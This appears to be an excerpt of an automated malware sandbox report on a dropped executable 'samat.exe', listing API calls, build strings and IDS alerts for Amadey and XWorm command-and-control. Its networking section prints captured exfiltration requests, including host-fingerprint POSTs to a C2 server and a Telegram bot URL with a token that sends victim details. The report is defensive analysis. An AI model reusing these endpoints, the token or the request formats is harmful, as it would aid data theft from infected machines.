                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B834CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,8_2_00007FF8B834CD30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8381970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,8_2_00007FF8B8381970
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B83AB900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,8_2_00007FF8B83AB900
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B833F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,8_2_00007FF8B833F910
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8331E6A ERR_new,ERR_set_debug,CRYPTO_clear_free,8_2_00007FF8B8331E6A
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8331A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,8_2_00007FF8B8331A41
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B833105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,8_2_00007FF8B833105F
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B837D980 RAND_bytes_ex,CRYPTO_malloc,memset,8_2_00007FF8B837D980
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B83311DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,8_2_00007FF8B83311DB
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8393A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,8_2_00007FF8B8393A60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8347A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,8_2_00007FF8B8347A60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8379A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,8_2_00007FF8B8379A60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8373A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,8_2_00007FF8B8373A00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8331A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,8_2_00007FF8B8331A15
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B839BA20 CRYPTO_free,CRYPTO_free,CRYPTO_free,8_2_00007FF8B839BA20
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
                    Source: unknownHTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                    Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose,7_2_00007FF7E12C9280
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7E12C83C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7E12E1874
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose,8_2_00007FF7E12C9280
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF7E12C83C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF7E12E1874
                    Source: chrome.exeMemory has grown: Private usage: 11MB later: 27MB

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49818
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49880 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50124 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50148 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50146
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50155
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50155 -> 87.120.112.33:8398
                    Source: Network trafficSuricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.5:50155
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50179
                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:50152 -> 149.154.167.220:443
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficTCP traffic: 192.168.2.5:49822 -> 1.1.1.1:53
                    Source: global trafficTCP traffic: 192.168.2.5:50104 -> 1.1.1.1:53
                    Source: global trafficHTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
                    Source: global trafficHTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008029001&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
